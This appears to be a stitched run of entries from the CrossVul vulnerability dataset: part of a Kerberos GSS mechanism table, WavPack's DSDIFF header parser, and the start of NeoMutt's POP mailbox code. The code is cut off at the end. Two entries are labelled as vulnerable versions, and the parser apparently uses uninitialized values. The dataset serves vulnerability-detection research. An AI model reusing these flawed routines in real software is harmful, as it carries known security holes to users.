return user_ok ? GSS_S_COMPLETE : GSS_S_UNAUTHORIZED;
}
static struct gss_config krb5_mechanism = {
{ GSS_MECH_KRB5_OID_LENGTH, GSS_MECH_KRB5_OID },
NULL,
krb5_gss_acquire_cred,
krb5_gss_release_cred,
krb5_gss_init_sec_context,
#ifdef LEAN_CLIENT
NULL,
#else
krb5_gss_accept_sec_context,
#endif
krb5_gss_process_context_token,
krb5_gss_delete_sec_context,
krb5_gss_context_time,
krb5_gss_get_mic,
krb5_gss_verify_mic,
#if defined(IOV_SHIM_EXERCISE_WRAP) || defined(IOV_SHIM_EXERCISE)
NULL,
#else
krb5_gss_wrap,
#endif
#if defined(IOV_SHIM_EXERCISE_UNWRAP) || defined(IOV_SHIM_EXERCISE)
NULL,
#else
krb5_gss_unwrap,
#endif
krb5_gss_display_status,
krb5_gss_indicate_mechs,
krb5_gss_compare_name,
krb5_gss_display_name,
krb5_gss_import_name,
krb5_gss_release_name,
krb5_gss_inquire_cred,
NULL, /* add_cred */
#ifdef LEAN_CLIENT
NULL,
NULL,
#else
krb5_gss_export_sec_context,
krb5_gss_import_sec_context,
#endif
krb5_gss_inquire_cred_by_mech,
krb5_gss_inquire_names_for_mech,
krb5_gss_inquire_context,
krb5_gss_internal_release_oid,
krb5_gss_wrap_size_limit,
krb5_gss_localname,
krb5_gss_authorize_localname,
krb5_gss_export_name,
krb5_gss_duplicate_name,
krb5_gss_store_cred,
krb5_gss_inquire_sec_context_by_oid,
krb5_gss_inquire_cred_by_oid,
krb5_gss_set_sec_context_option,
krb5_gssspi_set_cred_option,
krb5_gssspi_mech_invoke,
NULL, /* wrap_aead */
NULL, /* unwrap_aead */
krb5_gss_wrap_iov,
krb5_gss_unwrap_iov,
krb5_gss_wrap_iov_length,
NULL, /* complete_auth_token */
krb5_gss_acquire_cred_impersonate_name,
NULL, /* krb5_gss_add_cred_impersonate_name */
NULL, /* display_name_ext */
krb5_gss_inquire_name,
krb5_gss_get_name_attribute,
krb5_gss_set_name_attribute,
krb5_gss_delete_name_attribute,
krb5_gss_export_name_composite,
krb5_gss_map_name_to_any,
krb5_gss_release_any_name_mapping,
krb5_gss_pseudo_random,
NULL, /* set_neg_mechs */
krb5_gss_inquire_saslname_for_mech,
krb5_gss_inquire_mech_for_saslname,
krb5_gss_inquire_attrs_for_mech,
krb5_gss_acquire_cred_from,
krb5_gss_store_cred_into,
krb5_gss_acquire_cred_with_password,
krb5_gss_export_cred,
krb5_gss_import_cred,
NULL, /* import_sec_context_by_mech */
NULL, /* import_name_by_mech */
NULL, /* import_cred_by_mech */
krb5_gss_get_mic_iov,
krb5_gss_verify_mic_iov,
krb5_gss_get_mic_iov_length,
};
#ifdef _GSS_STATIC_LINK
#include "mglueP.h"
static int gss_iakerbmechglue_init(void)
{
struct gss_mech_config mech_iakerb;
struct gss_config iakerb_mechanism = krb5_mechanism;
/* IAKERB mechanism mirrors krb5, but with different context SPIs */
iakerb_mechanism.gss_accept_sec_context = iakerb_gss_accept_sec_context;
iakerb_mechanism.gss_init_sec_context = iakerb_gss_init_sec_context;
iakerb_mechanism.gss_delete_sec_context = iakerb_gss_delete_sec_context;
iakerb_mechanism.gss_acquire_cred = iakerb_gss_acquire_cred;
iakerb_mechanism.gssspi_acquire_cred_with_password
= iakerb_gss_acquire_cred_with_password;
memset(&mech_iakerb, 0, sizeof(mech_iakerb));
mech_iakerb.mech = &iakerb_mechanism;
mech_iakerb.mechNameStr = "iakerb";
mech_iakerb.mech_type = (gss_OID)gss_mech_iakerb;
gssint_register_mechinfo(&mech_iakerb);
return 0;
}
static int gss_krb5mechglue_init(void)
{
struct gss_mech_config mech_krb5;
memset(&mech_krb5, 0, sizeof(mech_krb5));
mech_krb5.mech = &krb5_mechanism;
mech_krb5.mechNameStr = "kerberos_v5";
mech_krb5.mech_type = (gss_OID)gss_mech_krb5;
gssint_register_mechinfo(&mech_krb5);
mech_krb5.mechNameStr = "kerberos_v5_old";
mech_krb5.mech_type = (gss_OID)gss_mech_krb5_old;
gssint_register_mechinfo(&mech_krb5);
mech_krb5.mechNameStr = "mskrb";
mech_krb5.mech_type = (gss_OID)gss_mech_krb5_wrong;
gssint_register_mechinfo(&mech_krb5);
return 0;
}
#else
MAKE_INIT_FUNCTION(gss_krb5int_lib_init);
MAKE_FINI_FUNCTION(gss_krb5int_lib_fini);
gss_mechanism KRB5_CALLCONV
gss_mech_initialize(void)
{
return &krb5_mechanism;
}
#endif /* _GSS_STATIC_LINK */
int gss_krb5int_lib_init(void)
{
int err;
#ifdef SHOW_INITFINI_FUNCS
printf("gss_krb5int_lib_init\n");
#endif
add_error_table(&et_k5g_error_table);
#ifndef LEAN_CLIENT
err = k5_mutex_finish_init(&gssint_krb5_keytab_lock);
if (err)
return err;
#endif /* LEAN_CLIENT */
err = k5_key_register(K5_KEY_GSS_KRB5_SET_CCACHE_OLD_NAME, free);
if (err)
return err;
err = k5_key_register(K5_KEY_GSS_KRB5_CCACHE_NAME, free);
if (err)
return err;
err = k5_key_register(K5_KEY_GSS_KRB5_ERROR_MESSAGE,
krb5_gss_delete_error_info);
if (err)
return err;
#ifndef _WIN32
err = k5_mutex_finish_init(&kg_kdc_flag_mutex);
if (err)
return err;
err = k5_mutex_finish_init(&kg_vdb.mutex);
if (err)
return err;
#endif
#ifdef _GSS_STATIC_LINK
err = gss_krb5mechglue_init();
if (err)
return err;
err = gss_iakerbmechglue_init();
if (err)
return err;
#endif
return 0;
}
void gss_krb5int_lib_fini(void)
{
#ifndef _GSS_STATIC_LINK
if (!INITIALIZER_RAN(gss_krb5int_lib_init) || PROGRAM_EXITING()) {
# ifdef SHOW_INITFINI_FUNCS
printf("gss_krb5int_lib_fini: skipping\n");
# endif
return;
}
#endif
#ifdef SHOW_INITFINI_FUNCS
printf("gss_krb5int_lib_fini\n");
#endif
remove_error_table(&et_k5g_error_table);
k5_key_delete(K5_KEY_GSS_KRB5_SET_CCACHE_OLD_NAME);
k5_key_delete(K5_KEY_GSS_KRB5_CCACHE_NAME);
k5_key_delete(K5_KEY_GSS_KRB5_ERROR_MESSAGE);
k5_mutex_destroy(&kg_vdb.mutex);
#ifndef _WIN32
k5_mutex_destroy(&kg_kdc_flag_mutex);
#endif
#ifndef LEAN_CLIENT
k5_mutex_destroy(&gssint_krb5_keytab_lock);
#endif /* LEAN_CLIENT */
}
#ifdef _GSS_STATIC_LINK
extern OM_uint32 gssint_lib_init(void);
#endif
OM_uint32 gss_krb5int_initialize_library (void)
{
#ifdef _GSS_STATIC_LINK
return gssint_mechglue_initialize_library();
#else
return CALL_INIT_FUNCTION(gss_krb5int_lib_init);
#endif
}
| ./CrossVul/dataset_final_sorted/CWE-18/c/bad_1535_1 |
crossvul-cpp_data_bad_824_0 | ////////////////////////////////////////////////////////////////////////////
// **** WAVPACK **** //
// Hybrid Lossless Wavefile Compressor //
// Copyright (c) 1998 - 2019 David Bryant. //
// All Rights Reserved. //
// Distributed under the BSD Software License (see license.txt) //
////////////////////////////////////////////////////////////////////////////
// dsdiff.c
// This module is a helper to the WavPack command-line programs to support DFF files.
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <math.h>
#include <stdio.h>
#include <ctype.h>
#include "wavpack.h"
#include "utils.h"
#include "md5.h"
#ifdef _WIN32
#define strdup(x) _strdup(x)
#endif
#define WAVPACK_NO_ERROR 0
#define WAVPACK_SOFT_ERROR 1
#define WAVPACK_HARD_ERROR 2
extern int debug_logging_mode;
#pragma pack(push,2)
typedef struct {
char ckID [4];
int64_t ckDataSize;
} DFFChunkHeader;
typedef struct {
char ckID [4];
int64_t ckDataSize;
char formType [4];
} DFFFileHeader;
typedef struct {
char ckID [4];
int64_t ckDataSize;
uint32_t version;
} DFFVersionChunk;
typedef struct {
char ckID [4];
int64_t ckDataSize;
uint32_t sampleRate;
} DFFSampleRateChunk;
typedef struct {
char ckID [4];
int64_t ckDataSize;
uint16_t numChannels;
} DFFChannelsHeader;
typedef struct {
char ckID [4];
int64_t ckDataSize;
char compressionType [4];
} DFFCompressionHeader;
#pragma pack(pop)
#define DFFChunkHeaderFormat "4D"
#define DFFFileHeaderFormat "4D4"
#define DFFVersionChunkFormat "4DL"
#define DFFSampleRateChunkFormat "4DL"
#define DFFChannelsHeaderFormat "4DS"
#define DFFCompressionHeaderFormat "4D4"
int ParseDsdiffHeaderConfig (FILE *infile, char *infilename, char *fourcc, WavpackContext *wpc, WavpackConfig *config)
{
int64_t infilesize, total_samples;
DFFFileHeader dff_file_header;
DFFChunkHeader dff_chunk_header;
uint32_t bcount;
infilesize = DoGetFileSize (infile);
memcpy (&dff_file_header, fourcc, 4);
if ((!DoReadFile (infile, ((char *) &dff_file_header) + 4, sizeof (DFFFileHeader) - 4, &bcount) ||
bcount != sizeof (DFFFileHeader) - 4) || strncmp (dff_file_header.formType, "DSD ", 4)) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, &dff_file_header, sizeof (DFFFileHeader))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
#if 1 // this might be a little too picky...
WavpackBigEndianToNative (&dff_file_header, DFFFileHeaderFormat);
if (infilesize && !(config->qmode & QMODE_IGNORE_LENGTH) &&
dff_file_header.ckDataSize && dff_file_header.ckDataSize + 1 && dff_file_header.ckDataSize + 12 != infilesize) {
error_line ("%s is not a valid .DFF file (by total size)!", infilename);
return WAVPACK_SOFT_ERROR;
}
if (debug_logging_mode)
error_line ("file header indicated length = %lld", dff_file_header.ckDataSize);
#endif
// loop through all elements of the DSDIFF header
// (until the data chuck) and copy them to the output file
while (1) {
if (!DoReadFile (infile, &dff_chunk_header, sizeof (DFFChunkHeader), &bcount) ||
bcount != sizeof (DFFChunkHeader)) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, &dff_chunk_header, sizeof (DFFChunkHeader))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
WavpackBigEndianToNative (&dff_chunk_header, DFFChunkHeaderFormat);
if (debug_logging_mode)
error_line ("chunk header indicated length = %lld", dff_chunk_header.ckDataSize);
if (!strncmp (dff_chunk_header.ckID, "FVER", 4)) {
uint32_t version;
if (dff_chunk_header.ckDataSize != sizeof (version) ||
!DoReadFile (infile, &version, sizeof (version), &bcount) ||
bcount != sizeof (version)) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, &version, sizeof (version))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
WavpackBigEndianToNative (&version, "L");
if (debug_logging_mode)
error_line ("dsdiff file version = 0x%08x", version);
}
else if (!strncmp (dff_chunk_header.ckID, "PROP", 4)) {
char *prop_chunk;
if (dff_chunk_header.ckDataSize < 4 || dff_chunk_header.ckDataSize > 1024) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
if (debug_logging_mode)
error_line ("got PROP chunk of %d bytes total", (int) dff_chunk_header.ckDataSize);
prop_chunk = malloc ((size_t) dff_chunk_header.ckDataSize);
if (!DoReadFile (infile, prop_chunk, (uint32_t) dff_chunk_header.ckDataSize, &bcount) ||
bcount != dff_chunk_header.ckDataSize) {
error_line ("%s is not a valid .DFF file!", infilename);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, prop_chunk, (uint32_t) dff_chunk_header.ckDataSize)) {
error_line ("%s", WavpackGetErrorMessage (wpc));
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
if (!strncmp (prop_chunk, "SND ", 4)) {
char *cptr = prop_chunk + 4, *eptr = prop_chunk + dff_chunk_header.ckDataSize;
uint16_t numChannels = 0, chansSpecified, chanMask = 0;
uint32_t sampleRate;
while (eptr - cptr >= sizeof (dff_chunk_header)) {
memcpy (&dff_chunk_header, cptr, sizeof (dff_chunk_header));
cptr += sizeof (dff_chunk_header);
WavpackBigEndianToNative (&dff_chunk_header, DFFChunkHeaderFormat);
if (dff_chunk_header.ckDataSize > 0 && dff_chunk_header.ckDataSize <= eptr - cptr) {
if (!strncmp (dff_chunk_header.ckID, "FS ", 4) && dff_chunk_header.ckDataSize == 4) {
memcpy (&sampleRate, cptr, sizeof (sampleRate));
WavpackBigEndianToNative (&sampleRate, "L");
cptr += dff_chunk_header.ckDataSize;
if (debug_logging_mode)
error_line ("got sample rate of %u Hz", sampleRate);
}
else if (!strncmp (dff_chunk_header.ckID, "CHNL", 4) && dff_chunk_header.ckDataSize >= 2) {
memcpy (&numChannels, cptr, sizeof (numChannels));
WavpackBigEndianToNative (&numChannels, "S");
cptr += sizeof (numChannels);
chansSpecified = (int)(dff_chunk_header.ckDataSize - sizeof (numChannels)) / 4;
if (numChannels < chansSpecified || numChannels < 1 || numChannels > 256) {
error_line ("%s is not a valid .DFF file!", infilename);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
while (chansSpecified--) {
if (!strncmp (cptr, "SLFT", 4) || !strncmp (cptr, "MLFT", 4))
chanMask |= 0x1;
else if (!strncmp (cptr, "SRGT", 4) || !strncmp (cptr, "MRGT", 4))
chanMask |= 0x2;
else if (!strncmp (cptr, "LS ", 4))
chanMask |= 0x10;
else if (!strncmp (cptr, "RS ", 4))
chanMask |= 0x20;
else if (!strncmp (cptr, "C ", 4))
chanMask |= 0x4;
else if (!strncmp (cptr, "LFE ", 4))
chanMask |= 0x8;
else
if (debug_logging_mode)
error_line ("undefined channel ID %c%c%c%c", cptr [0], cptr [1], cptr [2], cptr [3]);
cptr += 4;
}
if (debug_logging_mode)
error_line ("%d channels, mask = 0x%08x", numChannels, chanMask);
}
else if (!strncmp (dff_chunk_header.ckID, "CMPR", 4) && dff_chunk_header.ckDataSize >= 4) {
if (strncmp (cptr, "DSD ", 4)) {
error_line ("DSDIFF files must be uncompressed, not \"%c%c%c%c\"!",
cptr [0], cptr [1], cptr [2], cptr [3]);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
cptr += dff_chunk_header.ckDataSize;
}
else {
if (debug_logging_mode)
error_line ("got PROP/SND chunk type \"%c%c%c%c\" of %d bytes", dff_chunk_header.ckID [0],
dff_chunk_header.ckID [1], dff_chunk_header.ckID [2], dff_chunk_header.ckID [3], dff_chunk_header.ckDataSize);
cptr += dff_chunk_header.ckDataSize;
}
}
else {
error_line ("%s is not a valid .DFF file!", infilename);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
}
if (chanMask && (config->channel_mask || (config->qmode & QMODE_CHANS_UNASSIGNED))) {
error_line ("this DSDIFF file already has channel order information!");
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
else if (chanMask)
config->channel_mask = chanMask;
config->bits_per_sample = 8;
config->bytes_per_sample = 1;
config->num_channels = numChannels;
config->sample_rate = sampleRate / 8;
config->qmode |= QMODE_DSD_MSB_FIRST;
}
else if (debug_logging_mode)
error_line ("got unknown PROP chunk type \"%c%c%c%c\" of %d bytes",
prop_chunk [0], prop_chunk [1], prop_chunk [2], prop_chunk [3], dff_chunk_header.ckDataSize);
free (prop_chunk);
}
else if (!strncmp (dff_chunk_header.ckID, "DSD ", 4)) {
if (!config->num_channels) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
total_samples = dff_chunk_header.ckDataSize / config->num_channels;
break;
}
else { // just copy unknown chunks to output file
int bytes_to_copy = (int)(((dff_chunk_header.ckDataSize) + 1) & ~(int64_t)1);
char *buff;
if (bytes_to_copy < 0 || bytes_to_copy > 4194304) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
buff = malloc (bytes_to_copy);
if (debug_logging_mode)
error_line ("extra unknown chunk \"%c%c%c%c\" of %d bytes",
dff_chunk_header.ckID [0], dff_chunk_header.ckID [1], dff_chunk_header.ckID [2],
dff_chunk_header.ckID [3], dff_chunk_header.ckDataSize);
if (!DoReadFile (infile, buff, bytes_to_copy, &bcount) ||
bcount != bytes_to_copy ||
(!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, buff, bytes_to_copy))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
free (buff);
return WAVPACK_SOFT_ERROR;
}
free (buff);
}
}
if (debug_logging_mode)
error_line ("setting configuration with %lld samples", total_samples);
if (!WavpackSetConfiguration64 (wpc, config, total_samples, NULL)) {
error_line ("%s: %s", infilename, WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
return WAVPACK_NO_ERROR;
}
int WriteDsdiffHeader (FILE *outfile, WavpackContext *wpc, int64_t total_samples, int qmode)
{
uint32_t chan_mask = WavpackGetChannelMask (wpc);
int num_channels = WavpackGetNumChannels (wpc);
DFFFileHeader file_header, prop_header;
DFFChunkHeader data_header;
DFFVersionChunk ver_chunk;
DFFSampleRateChunk fs_chunk;
DFFChannelsHeader chan_header;
DFFCompressionHeader cmpr_header;
char *cmpr_name = "\016not compressed", *chan_ids;
int64_t file_size, prop_chunk_size, data_size;
int cmpr_name_size, chan_ids_size;
uint32_t bcount;
if (debug_logging_mode)
error_line ("WriteDsdiffHeader (), total samples = %lld, qmode = 0x%02x\n",
(long long) total_samples, qmode);
cmpr_name_size = (strlen (cmpr_name) + 1) & ~1;
chan_ids_size = num_channels * 4;
chan_ids = malloc (chan_ids_size);
if (chan_ids) {
uint32_t scan_mask = 0x1;
char *cptr = chan_ids;
int ci, uci = 0;
for (ci = 0; ci < num_channels; ++ci) {
while (scan_mask && !(scan_mask & chan_mask))
scan_mask <<= 1;
if (scan_mask & 0x1)
memcpy (cptr, num_channels <= 2 ? "SLFT" : "MLFT", 4);
else if (scan_mask & 0x2)
memcpy (cptr, num_channels <= 2 ? "SRGT" : "MRGT", 4);
else if (scan_mask & 0x4)
memcpy (cptr, "C ", 4);
else if (scan_mask & 0x8)
memcpy (cptr, "LFE ", 4);
else if (scan_mask & 0x10)
memcpy (cptr, "LS ", 4);
else if (scan_mask & 0x20)
memcpy (cptr, "RS ", 4);
else {
cptr [0] = 'C';
cptr [1] = (uci / 100) + '0';
cptr [2] = ((uci % 100) / 10) + '0';
cptr [3] = (uci % 10) + '0';
uci++;
}
scan_mask <<= 1;
cptr += 4;
}
}
else {
error_line ("can't allocate memory!");
return FALSE;
}
data_size = total_samples * num_channels;
prop_chunk_size = sizeof (prop_header) + sizeof (fs_chunk) + sizeof (chan_header) + chan_ids_size + sizeof (cmpr_header) + cmpr_name_size;
file_size = sizeof (file_header) + sizeof (ver_chunk) + prop_chunk_size + sizeof (data_header) + ((data_size + 1) & ~(int64_t)1);
memcpy (file_header.ckID, "FRM8", 4);
file_header.ckDataSize = file_size - 12;
memcpy (file_header.formType, "DSD ", 4);
memcpy (prop_header.ckID, "PROP", 4);
prop_header.ckDataSize = prop_chunk_size - 12;
memcpy (prop_header.formType, "SND ", 4);
memcpy (ver_chunk.ckID, "FVER", 4);
ver_chunk.ckDataSize = sizeof (ver_chunk) - 12;
ver_chunk.version = 0x01050000;
memcpy (fs_chunk.ckID, "FS ", 4);
fs_chunk.ckDataSize = sizeof (fs_chunk) - 12;
fs_chunk.sampleRate = WavpackGetSampleRate (wpc) * 8;
memcpy (chan_header.ckID, "CHNL", 4);
chan_header.ckDataSize = sizeof (chan_header) + chan_ids_size - 12;
chan_header.numChannels = num_channels;
memcpy (cmpr_header.ckID, "CMPR", 4);
cmpr_header.ckDataSize = sizeof (cmpr_header) + cmpr_name_size - 12;
memcpy (cmpr_header.compressionType, "DSD ", 4);
memcpy (data_header.ckID, "DSD ", 4);
data_header.ckDataSize = data_size;
WavpackNativeToBigEndian (&file_header, DFFFileHeaderFormat);
WavpackNativeToBigEndian (&ver_chunk, DFFVersionChunkFormat);
WavpackNativeToBigEndian (&prop_header, DFFFileHeaderFormat);
WavpackNativeToBigEndian (&fs_chunk, DFFSampleRateChunkFormat);
WavpackNativeToBigEndian (&chan_header, DFFChannelsHeaderFormat);
WavpackNativeToBigEndian (&cmpr_header, DFFCompressionHeaderFormat);
WavpackNativeToBigEndian (&data_header, DFFChunkHeaderFormat);
if (!DoWriteFile (outfile, &file_header, sizeof (file_header), &bcount) || bcount != sizeof (file_header) ||
!DoWriteFile (outfile, &ver_chunk, sizeof (ver_chunk), &bcount) || bcount != sizeof (ver_chunk) ||
!DoWriteFile (outfile, &prop_header, sizeof (prop_header), &bcount) || bcount != sizeof (prop_header) ||
!DoWriteFile (outfile, &fs_chunk, sizeof (fs_chunk), &bcount) || bcount != sizeof (fs_chunk) ||
!DoWriteFile (outfile, &chan_header, sizeof (chan_header), &bcount) || bcount != sizeof (chan_header) ||
!DoWriteFile (outfile, chan_ids, chan_ids_size, &bcount) || bcount != chan_ids_size ||
!DoWriteFile (outfile, &cmpr_header, sizeof (cmpr_header), &bcount) || bcount != sizeof (cmpr_header) ||
!DoWriteFile (outfile, cmpr_name, cmpr_name_size, &bcount) || bcount != cmpr_name_size ||
!DoWriteFile (outfile, &data_header, sizeof (data_header), &bcount) || bcount != sizeof (data_header)) {
error_line ("can't write .DSF data, disk probably full!");
free (chan_ids);
return FALSE;
}
free (chan_ids);
return TRUE;
}
| ./CrossVul/dataset_final_sorted/CWE-824/c/bad_824_0 |
crossvul-cpp_data_good_250_0 | /**
* @file
* POP network mailbox
*
* @authors
* Copyright (C) 2000-2002 Vsevolod Volkov <vvv@mutt.org.ua>
* Copyright (C) 2006-2007,2009 Rocco Rutte <pdmef@gmx.net>
*
* @copyright
* This program is free software: you can redistribute it and/or modify it under
* the terms of the GNU General Public License as published by the Free Software
* Foundation, either version 2 of the License, or (at your option) any later
* version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
* details.
*
* You should have received a copy of the GNU General Public License along with
* this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**
* @page pop POP network mailbox
*
* POP network mailbox
*/
#include "config.h"
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "mutt/mutt.h"
#include "conn/conn.h"
#include "mutt.h"
#include "pop.h"
#include "bcache.h"
#include "body.h"
#include "context.h"
#include "envelope.h"
#include "globals.h"
#include "header.h"
#include "mailbox.h"
#include "mutt_account.h"
#include "mutt_curses.h"
#include "mutt_socket.h"
#include "mx.h"
#include "ncrypt/ncrypt.h"
#include "options.h"
#include "progress.h"
#include "protos.h"
#include "url.h"
#ifdef USE_HCACHE
#include "hcache/hcache.h"
#endif
#ifdef USE_HCACHE
#define HC_FNAME "neomutt" /* filename for hcache as POP lacks paths */
#define HC_FEXT "hcache" /* extension for hcache as POP lacks paths */
#endif
/**
* cache_id - Make a message-cache-compatible id
* @param id POP message id
* @retval ptr Sanitised string
*
* The POP message id may contain '/' and other awkward characters.
*
* @note This function returns a pointer to a static buffer.
*/
static const char *cache_id(const char *id)
{
static char clean[SHORT_STRING];
mutt_str_strfcpy(clean, id, sizeof(clean));
mutt_file_sanitize_filename(clean, true);
return clean;
}
/**
* fetch_message - write line to file
* @param line String to write
* @param file FILE pointer to write to
* @retval 0 Success
* @retval -1 Failure
*/
static int fetch_message(char *line, void *file)
{
FILE *f = (FILE *) file;
fputs(line, f);
if (fputc('\n', f) == EOF)
return -1;
return 0;
}
/**
* pop_read_header - Read header
* @param pop_data POP data
* @param h Email header
* @retval 0 Success
* @retval -1 Connection lost
* @retval -2 Invalid command or execution error
* @retval -3 Error writing to tempfile
*/
static int pop_read_header(struct PopData *pop_data, struct Header *h)
{
int rc, index;
size_t length;
char buf[LONG_STRING];
FILE *f = mutt_file_mkstemp();
if (!f)
{
mutt_perror("mutt_file_mkstemp failed!");
return -3;
}
snprintf(buf, sizeof(buf), "LIST %d\r\n", h->refno);
rc = pop_query(pop_data, buf, sizeof(buf));
if (rc == 0)
{
sscanf(buf, "+OK %d %zu", &index, &length);
snprintf(buf, sizeof(buf), "TOP %d 0\r\n", h->refno);
rc = pop_fetch_data(pop_data, buf, NULL, fetch_message, f);
if (pop_data->cmd_top == 2)
{
if (rc == 0)
{
pop_data->cmd_top = 1;
mutt_debug(1, "set TOP capability\n");
}
if (rc == -2)
{
pop_data->cmd_top = 0;
mutt_debug(1, "unset TOP capability\n");
snprintf(pop_data->err_msg, sizeof(pop_data->err_msg), "%s",
_("Command TOP is not supported by server."));
}
}
}
switch (rc)
{
case 0:
{
rewind(f);
h->env = mutt_rfc822_read_header(f, h, 0, 0);
h->content->length = length - h->content->offset + 1;
rewind(f);
while (!feof(f))
{
h->content->length--;
fgets(buf, sizeof(buf), f);
}
break;
}
case -2:
{
mutt_error("%s", pop_data->err_msg);
break;
}
case -3:
{
mutt_error(_("Can't write header to temporary file!"));
break;
}
}
mutt_file_fclose(&f);
return rc;
}
/**
* fetch_uidl - parse UIDL
* @param line String to parse
* @param data Mailbox Context
* @retval 0 Success
* @retval -1 Failure
*/
static int fetch_uidl(char *line, void *data)
{
int i, index;
struct Context *ctx = (struct Context *) data;
struct PopData *pop_data = (struct PopData *) ctx->data;
char *endp = NULL;
errno = 0;
index = strtol(line, &endp, 10);
if (errno)
return -1;
while (*endp == ' ')
endp++;
memmove(line, endp, strlen(endp) + 1);
/* uid must be at least be 1 byte */
if (strlen(line) == 0)
return -1;
for (i = 0; i < ctx->msgcount; i++)
if (mutt_str_strcmp(line, ctx->hdrs[i]->data) == 0)
break;
if (i == ctx->msgcount)
{
mutt_debug(1, "new header %d %s\n", index, line);
if (i >= ctx->hdrmax)
mx_alloc_memory(ctx);
ctx->msgcount++;
ctx->hdrs[i] = mutt_header_new();
ctx->hdrs[i]->data = mutt_str_strdup(line);
}
else if (ctx->hdrs[i]->index != index - 1)
pop_data->clear_cache = true;
ctx->hdrs[i]->refno = index;
ctx->hdrs[i]->index = index - 1;
return 0;
}
/**
* msg_cache_check - Check the Body Cache for an ID
* @param id Cache ID
* @param bcache Body cache
* @param data Mailbox Context
* @retval 0 Success
* @retval -1 Failure
*/
static int msg_cache_check(const char *id, struct BodyCache *bcache, void *data)
{
struct Context *ctx = (struct Context *) data;
if (!ctx)
return -1;
struct PopData *pop_data = (struct PopData *) ctx->data;
if (!pop_data)
return -1;
#ifdef USE_HCACHE
/* keep hcache file if hcache == bcache */
if (strcmp(HC_FNAME "." HC_FEXT, id) == 0)
return 0;
#endif
for (int i = 0; i < ctx->msgcount; i++)
{
/* if the id we get is known for a header: done (i.e. keep in cache) */
if (ctx->hdrs[i]->data && (mutt_str_strcmp(ctx->hdrs[i]->data, id) == 0))
return 0;
}
/* message not found in context -> remove it from cache
* return the result of bcache, so we stop upon its first error
*/
return mutt_bcache_del(bcache, cache_id(id));
}
#ifdef USE_HCACHE
/**
* pop_hcache_namer - Create a header cache filename for a POP mailbox
* @param path Path of mailbox
* @param dest Buffer for filename
* @param destlen Length of buffer
* @retval num Characters written to buffer
*/
static int pop_hcache_namer(const char *path, char *dest, size_t destlen)
{
return snprintf(dest, destlen, "%s." HC_FEXT, path);
}
/**
* pop_hcache_open - Open the header cache
* @param pop_data POP server data
* @param path Path to the mailbox
* @retval ptr Header cache
*/
static header_cache_t *pop_hcache_open(struct PopData *pop_data, const char *path)
{
struct Url url;
char p[LONG_STRING];
if (!pop_data || !pop_data->conn)
return mutt_hcache_open(HeaderCache, path, NULL);
mutt_account_tourl(&pop_data->conn->account, &url);
url.path = HC_FNAME;
url_tostring(&url, p, sizeof(p), U_PATH);
return mutt_hcache_open(HeaderCache, p, pop_hcache_namer);
}
#endif
/**
* pop_fetch_headers - Read headers
* @param ctx Context
* @retval 0 Success
* @retval -1 Connection lost
* @retval -2 Invalid command or execution error
* @retval -3 Error writing to tempfile
*/
static int pop_fetch_headers(struct Context *ctx)
{
struct PopData *pop_data = (struct PopData *) ctx->data;
struct Progress progress;
#ifdef USE_HCACHE
header_cache_t *hc = pop_hcache_open(pop_data, ctx->path);
#endif
time(&pop_data->check_time);
pop_data->clear_cache = false;
for (int i = 0; i < ctx->msgcount; i++)
ctx->hdrs[i]->refno = -1;
const int old_count = ctx->msgcount;
int ret = pop_fetch_data(pop_data, "UIDL\r\n", NULL, fetch_uidl, ctx);
const int new_count = ctx->msgcount;
ctx->msgcount = old_count;
if (pop_data->cmd_uidl == 2)
{
if (ret == 0)
{
pop_data->cmd_uidl = 1;
mutt_debug(1, "set UIDL capability\n");
}
if (ret == -2 && pop_data->cmd_uidl == 2)
{
pop_data->cmd_uidl = 0;
mutt_debug(1, "unset UIDL capability\n");
snprintf(pop_data->err_msg, sizeof(pop_data->err_msg), "%s",
_("Command UIDL is not supported by server."));
}
}
if (!ctx->quiet)
{
mutt_progress_init(&progress, _("Fetching message headers..."),
MUTT_PROGRESS_MSG, ReadInc, new_count - old_count);
}
if (ret == 0)
{
int i, deleted;
for (i = 0, deleted = 0; i < old_count; i++)
{
if (ctx->hdrs[i]->refno == -1)
{
ctx->hdrs[i]->deleted = true;
deleted++;
}
}
if (deleted > 0)
{
mutt_error(
ngettext("%d message has been lost. Try reopening the mailbox.",
"%d messages have been lost. Try reopening the mailbox.", deleted),
deleted);
}
bool hcached = false;
for (i = old_count; i < new_count; i++)
{
if (!ctx->quiet)
